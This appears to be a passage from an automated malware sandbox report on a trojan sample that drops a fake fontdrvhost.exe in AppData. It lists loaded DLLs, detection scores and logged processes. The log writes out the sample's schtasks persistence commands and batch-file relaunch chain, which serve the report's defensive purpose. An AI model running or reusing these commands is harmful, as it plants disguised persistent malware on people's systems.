                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ktmw32.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rasapi32.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rasman.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rtutils.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dlnashext.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wpdshext.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ktmw32.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rasapi32.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rasman.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rtutils.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dlnashext.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wpdshext.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                        Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                        Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                        Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                        Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                        Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ktmw32.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rasapi32.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rasman.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rtutils.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dlnashext.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wpdshext.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                        Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                        Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                        Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ktmw32.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rasapi32.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rasman.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rtutils.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dlnashext.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wpdshext.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: srvcli.dll
                        Source: ZT3pxe2Tb4.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: ZT3pxe2Tb4.exe, aJCfPqCSvGmcYPx2WWy.csCryptographic APIs: 'CreateDecryptor'
                        Source: ZT3pxe2Tb4.exe, aJCfPqCSvGmcYPx2WWy.csCryptographic APIs: 'CreateDecryptor'
                        Source: ZT3pxe2Tb4.exe, aJCfPqCSvGmcYPx2WWy.csCryptographic APIs: 'CreateDecryptor'
                        Source: ZT3pxe2Tb4.exe, aJCfPqCSvGmcYPx2WWy.csCryptographic APIs: 'CreateDecryptor'
                        Source: DnshUSLJ.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                        Source: tAOrkGQb.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                        Source: SKewgrff.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                        Source: IbKgwPay.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                        Source: zsrQNmVQ.log.0.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                        Source: classification engineClassification label: mal100.troj.evad.winEXE@93/244@0/1
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\Desktop\tqrrAUxf.logJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1984:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5084:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\cfcca84f50e77cb6ac0a04c26d8ae71e39090d16a37d1ce7f59ef27a8be95bc3
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile created: C:\Users\user\AppData\Local\Temp\Haf5RcGt9xJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e2HUAivGfO.bat"
                        Source: ZT3pxe2Tb4.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: ZT3pxe2Tb4.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: ZT3pxe2Tb4.exeReversingLabs: Detection: 86%
                        Source: ZT3pxe2Tb4.exeVirustotal: Detection: 73%
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeFile read: C:\Users\user\Desktop\ZT3pxe2Tb4.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\ZT3pxe2Tb4.exe "C:\Users\user\Desktop\ZT3pxe2Tb4.exe"
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /f
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /rl HIGHEST /f
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /rl HIGHEST /f
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e2HUAivGfO.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: unknownProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe C:\Users\user\AppData\Local\fontdrvhost.exe
                        Source: unknownProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe C:\Users\user\AppData\Local\fontdrvhost.exe
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wuC6fcDv5B.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6WkFIbRMFr.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s2nU7uS06N.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZMh4UPVO0I.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\I3W1TCNLwG.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\fontdrvhost.exe "C:\Users\user\AppData\Local\fontdrvhost.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7nxekELsf0.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
